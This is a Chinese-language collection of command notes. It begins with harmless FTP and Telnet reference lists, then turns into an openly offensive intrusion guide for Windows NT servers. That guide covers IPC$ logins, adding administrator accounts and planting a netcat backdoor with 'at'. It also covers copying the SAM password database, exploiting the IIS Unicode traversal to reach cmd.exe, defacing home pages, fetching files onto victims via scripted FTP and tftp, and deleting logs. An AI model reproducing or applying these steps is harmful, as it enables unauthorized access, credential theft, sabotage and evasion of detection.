关于命令的使用 (收集整理)

关于命令的使用 1 1 1 1 1 ftp命令大全 FTP命令是Internet用户使用最频繁的命令之一,不论是在DOS还是UNIX操作系统下使用FTP,都会遇到大量的FTP内部命令,熟悉并灵活应用FTP的内部命令,可以大大方便使用者,对于现在拨号上网的用户，如果ISP提供了shell可以使用noh up，那么ftp将是你最省钱的上download方式， ftp的命令行格式为:ftp －v －d －i －n －g[主机名]　　－v 显示远程服务器的所有响应信息。－d 使用调试方式。　　－n 限制ftp的自动登录,即不使用.netrc文件。－g 取消全局文件名。 ftp使用的内部命令如下(其中括号表示可选项): 　　1.![cmd[args]在本地机中执行交互shell、exit回到ftp环境,如!ls＊.zip 。　　2.￥ macro－ame[args]执行宏定义macro－name。　　3.account[password]提供登录远程系统成功后访问系统资源所需的补充口令。　　4.appendlocal－file[remote－file]将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。　　5.ascii 使用ascii类型传输方式。　　6.bell每个命令执行完毕后计算机响铃一次。　　7.bin使用二进制文件传输方式。　　8.bye退出ftp会话过程。　　9.case在使用mget时,将远程主机文件名中的大写转为小写字母。　　10.cd remote－dir 进入远程主机目录。　　11.cdup进入远程主机目录的父目录。　　12.chmod modefile－name将远程主机文件file－name的存取方式设置为mode,如chmod 777 a.out。　　13.close中断与远程服务器的ftp会话(与open对应)。　　14.cr使用asscii方式传输文件时,将回车换行转换为回行。　　15.delete remote－file删除远程主机文件。　　16.debug[debug－value]设置调试方式,显示发送至远程主机的每条命令,如debup3,若设为0,表示取消debug。　　17.dir[remote－dir][local－file]显示远程主机目录,并将结果存入local－file。　　18.disconnection同close。　　19.form format将文件传输方式设置为format,缺省为file方式。　　20.getremote－file[local－file]将远程主机的文件remote－file传至本地硬盘的local－file。　　21.glob设置mdelete、mget、mput的文件名扩展,缺省时不扩展文件名,同命令行的－g参数。　　22.hash每传输1024字节,显示一个hash符号(＃)。　　23.help[cmd]显示ftp内部命令cmd的帮助信息,如help get。　　24.idle[seconds]将远程服务器的休眠计时器设为[seconds]秒。　　25.image设置二进制传输方式(同binary) 　　26.lcd[dir]将本地工作目录切换至dir。　　27.ls[remote－dir][local－file]显示远程目录remote－dir,并存入本地local－file。　　28.macdef macro－name定义一个宏,遇到macdef下的空行时,宏定义结束。　29.mdelete[remote－file]删除远程主机文件。　　30.mdir remote－files local－file与dir类似,但可指定多个远程文件,如mdir＊.o.＊. zipoutfile。　　31.mget remote－files传输多个远程文件。　　32.mkdir dir－name 在远程主机中建一目录。　　33.mls remote－file local－file同nlist,但可指定多个文件名。　　34.mode[mode－name]将文件传输方式设置为mode－name,缺省为stream方式。　　35.modtime file－name显示远程主机文件的最后修改时间。　　36.mput local－file将多个文件传输至远程主机。　　37.newerfile－name如果远程机中file－name的修改时间比本地硬盘同名文件的时间更近,则重传该文件。　　38.nlist[remote－dir][local－file]显示远程主机目录的文件清单,并存入本地硬盘的local－file。　　39.nmap[inpatternoutpattern]设置文件名映射机制,使得文件传输时,文件中的某些字符相互转换, 如nmap￥1.￥2.￥3[￥1,￥2].[￥2,￥3],则传输文件a1 .a2.a3时,文件名变为a1、a2，该命令特别适用于远程主机为非U－NIX机的情况。 40.ntrans[inchars[outchars]设置文件名字符的翻译机制,如ntrans1R,则文件名LL L将变为RRR。　　41.open host[port]建立指定ftp服务器连接,可指定连接端口。　　 42.passive进入被动传输方式。　　43.prompt设置多个文件传输时的交互提示。　　44.proxyftp－cmd在次要控制连接中,执行一条ftp命令,该命令允许连接两个ftp服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务器间的连接。　　45.put local－file[remote－file]将本地文件local－file传送至远程主机。　　46.pwd显示远程主机的当前工作目录。　　47.quit同bye,退出ftp会话。　　48.quote arg1,arg2……将参数逐字发至远程ftp服务器,如quote syst。　 49.recv remote－file[local－file]同get。　　50.regetremote－file[local－file]类似于get,但若local－file存在,则从上次传输中断处续传。　　51.rhelp[cmd－name]请求获得远程主机的帮助。　　52.rstatus[file－name]若未指定文件名,则显示远程主机的状态,否则显示文件状态。　　53.rename[from][to]更改远程主机文件名。　　 54.reset清除回答队列。　　55.restart marker从指定的标志marker处,重新开始get或put,如restart 130。　　56.rmdir dir－name删除远程主机目录。　　57.runique设置文件名唯一性存储,若文件存在,则在原文件后加后缀。　　58.send local－file[remote－file]同put。　　59.sendport设置PORT命令的使用。　　60.site arg1,arg2……将参数作为SITE命令逐字发送至远程ftp主机。　　61.size file－name显示远程主机文件大小,如site idle 7200。　　62.status显示当前ftp状态。　　63.struct[struct－name]将文件传输结构设置为struct－name,缺省时使用stream结构。 64.sunique将远程主机文件名存储设置为唯一(与runique对应)。　　65.system显示远程主机的操作系统类型。　　66.tenex将文件传输类型设置为TENEX机所需的类型。　　67.tick设置传输时的字节计数器。　　68.trace设置包跟踪。　　69.type[type－name]设置文件传输类型为type－name,缺省为ascii,如typebinary,设置二进制传输方式。　　70.umask[newmask]将远程服务器的缺省umask设置为newmask,如umask 3。 71.useruser－name[password][account]向远程主机表明自己的身份,需要口令时,必须输入口令,如user anonymous my@email。　　72.verbose同命令行的－v参数,即设置详尽报告方式,ftp服务器的所有响应都将显示给用户,缺省为on. 　　73.?[cmd]同help。　　那么如何应用这些命令提高效率呢？下面我举一个例子，如何利用fttp进行后台下载，假设你的ISP给你提供了shell并且可以用nohup，你想由fttp.downlo ad.com/pub/internet/下载一个30M的程序aaa.zip具体步骤如下： 1.用notepad做一个文件如aaa1内容如下　　 open ftp.dwonload.com user an onymous zyz@cenpok.net cd /pub/internet/ i get aaa.zip close bye 2.拨号登录到你的ISP上。用telnet 或netterm登录到shell，一般都在你的home子目录里bbs～/ 3.用fttp上传aaa1到ISP服务器你的子目录。　　　　 4. 执行nohup fttp －invd aaa2＆这样这个进程就被放在ISP服务器的后台进行了，如果你想知道情况如何，可以more aaa2就可以知道情况如何了。这时你可以断线了或干点别的，估计时间到了(time约=30M/(33.6K/9)s)拨号上去，more aaa2如果显示成功下载aaa.zip, 就表示aaa.zip已经被下载到ISP的服务器上了，你再由ISP的服务器拉回来就相当与点对点了, 记得下载完成后del掉你的文件(aaa.zip)，免得浪费ISP资源，它会关掉shell的。 1 1 1 1 1 1 1 Telnet的命令模式除了在Telnet是如何工作的例子介绍的以外,Telnet还有很多的特点。Telnet可发送除了"quot;escape"quot;的任何字符到远程主机上。因为"quot;escape"quot;字符在Telnet中是客户机的一个特殊的命令模式，它的默认值是"quot;Ctrl-]"quot;。但要注意不要与键盘上的Esc键混淆，我们可以设定"quot;escape"quot;为任意某个字符，只是对Telnet来说以为着该字符不可能再被传送到远程主机上，而Esc键是一非打印字符，Telnet用它来删除远程系统中的命令。而且还应记住，"quot;escape"quot;字符并不总以"quot;Ctrl-]"quot;来表示。可以仅仅键入Telnet,后面不带机器字句。这种情况下所看到的是Telnet"gt;,这是告知Telnet在等待键入命令，比如键入问号"quot;?"quot;那么就得到一个有用的命令表： telnet: ? Commands may be abbreviated, Command are: open connect to a site close close currect connection quit exit telnet display display operating parameters send transmit special characters ('send ?' for more) set set operating parameters('set ?' for more) status print status information toggle toggle operating parameters('toggle ?' for more) mode try to enter line-by-line or character-at-a-time mode ? print help information 虽然命令很多，甚至还有子命令，但只有一些是常用的。现在介绍以下的几个： Close：该命令用语终止连接。它自动切断与远程系统的连接，也可以用它退出Telnet，在冒失的进入一个网络主机时，想退出的话，就可以用到这个命令。 open：用它来与一个命名机器连接，要求给出目标机器的名字或IP地址。如果未给出机器名，Telnet就将要你选择一个机器名。必须注意，在使用"quot;Open"quot;命令之前应该先用"quot;close"quot;来关闭任何已经存在的连接。 Set ECHO：用于本地的响应是On或是Off。作用是是否把输出的内容显示在屏幕上。和DOS的ECHO基本上是一样。如果机器是处于ECHO ON的话，想改变为OFF，那么就可以输入SET ECHO,想再改变回ECHO OFF，那么就再键入SET ECHO就可以了。(这儿说的比较简短,如果有不明白的,可以与我联系) Set escape char: 建立"quot;escape"quot;字符到某个特殊的符号，若想用某种控制符号来代替，可以用"quot;asis"quot;或者键入符号"quot;^"quot;加字母b(如：^b）。在正常工作时，是不需要用"quot;escape"quot;这个字符的，并且这个被用作"quot;escape"quot;的符号不应该再被使用。这类似于许多程序中对键盘上的每一个键设定其真正的涵义。但如果正在运行一个 daisy-chained 应用系统，那么可以重新议定"quot;escape"quot;字符的特征便是很有用的。例如：用Telnet从系统A到系统B，接着又用Telnet注册进入系统C。如果正在系统C上工作时出了故障，那么当"quot;escape"quot;代表符是相同时，就没法中断系统B到系统C的连接。键入"quot;escape"quot;代表符，将总是处于系统A的命令模式。如果在每个Telnet部分使用不同的"quot;escape"quot;代表符，便可以通过键入适当的符号，来选择其中一个命令模式，这也可以用于其他的应用中（像终端仿真）。 Quit: 用它可顺利地推出Telnet程序。 Z: 用语保留Telnet但暂时回到本地系统执行其他命令。并且在Telnet中的连接以及其他的选择在Telnet恢复时仍被保留。 Carriage Return: 用于不具体的一个命令从命令模式返回到所连接的远程机器上。另外，还有许多其他的命令可以推出命令模式。下面举一个例子，是从注册进入到porky.math.ukans.edu ,然后进入命令模式，然后返回porky:: telnet porky.math.ukans.edu Trying 129.237.128.11... Connected to porky.math.ukans.edu. Escape character is '^]'. SunOS UNIX(porky) login:wl password: Last Login: Tue Mar 28 05:35 from ns.bta.net.cn SunOS Release 4.1.3_U1(SLIPPERY1) #3: Sun Nov 20 23:47:23 CST 1999 No match. if:Expression syntax. porky/serv/wl? porky/%CTRL-] telnet:? Commands may be abbreviated, Command are: open connect to a site close close currect connection quit exit telnet display display operating parameters send transmit special characters ('send ?' for more) set set operating parameters('set ?' for more) status print status information toggle toggle operating parameters('toggle ?' for more) mode try to enter line-by-line or character-at-a-time mode ? print help information telnet:set escape ^b escape character is ’^b’ porky/%logout ns.bta.net.cn% 注意：set命令也可以退出命令模式。当然，如果不行，可以回车输入一空行，也能回到porky 1 1 1 1 1 1 1 1 1 1 一般入侵所需要的几个常用命令 1：NET 只要你拥有某IP的用户名和密码，那就用IPC$做连接吧！这里我们假如你得到的用户是hbx，密码是123456。假设对方IP为127.0.0.1 net use \\127.0.0.1\ipc$ "123456" /user:"hbx" 断开连接的命令是 net use \\127.0.0.1\ipc$ /delte 下面的操作你必须登陆后才可以用.登陆的方法就在上面. ---------------------- 下面我们讲怎么创建一个用户，由于SA的权限相当于系统的超级用户. 我们加一个heibai的用户密码为lovechina net user heibai lovechina /add 只要显示命令成功,那么我们可以把他加入Administrator组了. net localgroup Administrators heibai /add ---------------------- 这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘. net use z:\\127.0.0.1\c$ ---------------------- net start telnet 这样可以打开对方的TELNET服务. ---------------------- 这里是将Guest用户激活，guest是NT的默认用户，而且无法删除呢？不知道是否这样，我的2000就是删除不了它。 net user guest /active:yes ---------------------- 这里是把一个用户的密码改掉，我们把guest的密码改为lovechina，其他用户也可以的。只要有权限就行了呀！ net user guest lovechina net命令果然强大啊！ 2:at 一般一个入侵者入侵后都会留下后门，也就是种木马了，你把木马传了上去，怎么启动他呢？那么需要用AT命令，这里假设你已经登陆了那个服务器。你首先要得到对方的时间， net time \\127.0.0.1 将会返回一个时间，这里假设时间为12:1,现在需要新建一个作业，其ID=1 at \\127.0.0.1 12:3 nc.exe 这里假设了一个木马，名为NC.EXE,这个东西要在对方服务器上. 这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99. 等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马. 3:telnet 这个命令非常实用,它可以与远方做连接，不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口. telnet 127.0.0.1 99 这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡. 4:FTP 它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个http://www.51.net,不错的.当我们申请完后，它会给用户名,密码,以及ftp服务器./ 在上传前需要登陆先，这里我们假设FTP服务器是http://www.51.net,用户名是hucjs,密码是654321/ ftp http://www.51.net/ 他会要求输入用户,成功后会要求输入密码. ---------------------- 下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\ get c:\index.htm d:\ 假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下 put c:\index.htm d:\ 5:copy 下面我说说怎样把本地的文件复制到对方硬盘上去，需要建立好IPC$连接才有效。这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下 copy index.htm \\127.0.0.1\c$\index.htm ---------------------- 如果你要复制到D盘下把C改为D，就行了！ copy index.htm \\127.0.0.1\d$\index.htm ---------------------- 如果你要把他复制到WINNT目录里就要把输入 copy index.htm \\127.0.0.1\admin$\index.htm admin$是winnt ---------------------- 要把对方的文件复制过来，顺便告诉大家NT的备份的数据库放在x:\winnt\repair\sam._ sam._是数据库的文件名下面就把127.0.0.1的数据库复制到本地C盘下 copy \\127.0.0.1\admin$\repair\sam._ c:\ ---------------------- 6：set 如果你跑进了一部机子，而且想黑他（这思想只能在特别时候才准有），当然他的80端口要开，不然你黑给谁看。这时需要用SET命令！下面是我得到的结果！我来分析它，只是找主页在那而已。 COMPUTERNAME=PENTIUMII ComSpec=D:\WINNT\system32\cmd.exe CONTENT_LENGTH=0 GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=*/* HTTP_ACCEPT_LANGUAGE=zh-cn HTTP_CONNECTION=Keep-Alive HTTP_HOST=当前登陆者的IP，这里本来是显示我的IP，被我删除了 HTTP_ACCEPT_ENCODING=gzip, deflate HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) NUMBER_OF_PROCESSORS=1 Os2LibPath=D:\WINNT\system32\os2\dll; OS=Windows_NT Path=D:\WINNT\system32;D:\WINNT PATHEXT=.COM;.EXE;.BAT;.CMD PATH_TRANSLATED=E:\vlroot主页放在的地址，只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\vlroot PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel PROCESSOR_LEVEL=6 PROCESSOR_REVISION=0303 PROMPT=$P$G QUERY_STRING=/c+set REMOTE_ADDR=XX.XX.XX.XX REMOTE_HOST=XX.XX.XX.XX REQUEST_METHOD=GET script_NAME=/scripts/..%2f../winnt/system32/cmd.exe SERVER_NAME=XX.XX.XX.XX SERVER_PORT=80 SERVER_PORT_SECURE=0 SERVER_PROTOCOL=HTTP/1.1 SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0 SystemDrive=D: SystemRoot=D:\WINNT TZ=GMT-9 USERPROFILE=D:\WINNT\Profiles\Default User windir=D:\WINNT 粉红色的那行就是对方主页存放地址，这里告诉大家一个技巧，很笨的技巧啊，不过只能用这个方法才能100%的找到主页的名称，当你DIR这个目录时，一定会看到很多文件，你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名，这样只要看到和XX.XX.XX.XX看到的也面一模一样，那么这就是主页的名称了。 7：nbtstat 如果你扫到一部NT的机子，他的136到139其中一个端口开了的话，就要用这个命令得到用户了。顺便告诉大家这是netbios，得到用户名后就可以猜猜密码了。例如比较简单的密码，密码和用户名一样的，都试下，不行就暴力破解吧！现在网上很多NT的机子都开了这些端口的，你可以练习下，我们来分析得到的结果。命令是 nbtstat -A XX.XX.XX.XX -A一定要大写哦。下面是得到的结果。 NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- Registered Registered Registered Registered Registered Registered Registered Reg istered Registered Registered Registered MAC Address = 00-E0-29-14-35-BA PENTIUMII <00> UNIQUE PENTIUMII <20> UNIQUE ORAHOTOWN <00> GROUP ORAHOTOWN <1C> GROUP ORAHOTOWN <1B> UNIQUE PENTIUMII <03> UNIQUE INet~Services <1C> GROUP IS~PENTIUMII...<00> UNIQUE ORAHOTOWN <1E> GROUP ORAHOTOWN <1D> UNIQUE ..__MSBROWSE__.<01> GROUP 红色的就是登陆过这部系统的用户，可能你不知道怎么看，大家是不是看到了一窜数字，只要这窜数字是<03>的话，那他前面的就是用户。这里的用户是PENTIUMII。 8：Shutdown 关了对方的NT服务器的命令 Shutdown \\IP地址 t:20 20秒后将NT自动关闭，三思后才能运行这个命令，这样对对方造很大的损失，要做个有良心的入侵者呀。 9：DIR 这个命令没什么好讲，但是却非常重要，他是查看一目录里的所有文件、文件夹。你可以本地试下。 10：echo 著名的漏洞Unicode，这个命令可以简单的黑一下有这个漏洞的主机。我们假设我们要把“南京大屠杀铁证如山，任何日本人不得抵赖！”写入index.htm，有2种方法，大家看看有什么区别。 echo 南京大屠杀铁证如山，任何日本人不得抵赖！>index.htm echo 南京大屠杀铁证如山，任何日本人不得抵赖！>>index.htm 第一个的意思是覆盖index.htm原有的内容，把“南京大屠杀铁证如山，任何日本人不得抵赖！”写进index.htm。第二个的意思是把“南京大屠杀铁证如山，任何日本人不得抵赖！”加到index.htm里面。 “>>”产生的内容将追加进文件中，“>”则将原文件内容覆盖。大家可以本地试下。可能你会问，这样简单黑下有什么好玩的，其实他可以用来下载主页到对方的目录里。 1、首先，我们需要申请一个免费的主页空间。 2、用echo在可写目录下建立如下内容的txt文件：（以chinren服务器为例。） open upload.chinaren.com（你的FTP服务器，申请时你的空间提供商会给你的） cnhack（你申请时的用户名） test（你申请时的密码） get index.htm c:\inetpub\wwwroot\index.htm（这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm） bye（退出FTP对话，相当在98下的DOS，用EXIT退出DOS）具体的做法：输入 echo open upload.chinaren.com> c:\cnhack.txt 输入 echo cnhack >> c:\cnhack.txt 输入 echo 39abs >> c:\cnhack.txt 输入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt 最后输入 ftp -s:c:\cnhack.txt （利用ftp的-s参数，执行文件里的内容。）等命令完成时，文件已经下载到你指定的文件里了。注意：取得文件后，请删除cnhack.txt。（如果不删除，很容易会给别人看到你的密码。）记得要 del c:\cnhack.txt 11:attrib 这个命令是设置文件属性的。如果你想黑一个站，而他的主页的文件属性设置了只读，那就很可怜呀，想删除他也不行，想覆盖他也不行。倒！不过有这个命令就别怕了。 attrib -r index.htm 这个命令是把index.htm的只读属性去掉。如果把“-”改为“+”则是把这个文件的属性设置为只读 ---------------------- attrib +r index.htm 这个命令是把index.htm的属性设置为只读。 12:del 当你看到这个标题可别倒下啊！现在要离开127.0.0.1了，要删除日志，当然要删除日志啦！想被捉吗。呵呵。 NT的日志有这些 del C:\winnt\system32\logfiles\*.* del C:\winnt\ssytem32\config\*.evt del C:\winnt\system32\dtclog\*.* del C:\winnt\system32\*.log del C:\winnt\system32\*.txt del C:\winnt\*.txt del C:\winnt\*.log 只要删除这些就可以了。有些系统NT安装在D盘或其他盘，就要把C改成其他盘。有时候可能删不掉你得先把服务程序关掉再删然后再打开服务。 1 1 1 1 1 1 1 tftp，一个功能强大的ftp代替软件，它强大的ftp功能可以绕过主机的用户名和口令验证，绕过IPC$通道，直接COPY我们需要的文件，使用极其方便，我就在使用中的一些心得，写一点下来，送给大家！一、上传：格式：tftp -i 现在你的IP get 源文件盘符：\\路径\\目标文件名二、下载：格式：tftp -i 对方的IP put 盘符：\路径\源文件名用法和注意点： 1、tftp必须在本机上先运行起来，充当虚拟服务器的角色。 2、tftp在运行中不得断开连接。 3、要上传的文件必须和tftp在一个目录中。 4、文件的默认下载位置就是tftp目录。 5、tftp在上传的格式中，目标地址要用双\\格开。 6、可以在任何对方的命令行使用tftp，如：跟在对方IP后的浏览器地址栏里（详细说明请参考U漏洞的贴子）、SQLEXEC的command输入行等等位置。 7、tftp默认属性是上传和下载的时候采用覆盖不提示的方式。 8、tftp上传的文件可能会加上只读属性，请上传完全毕后检阅！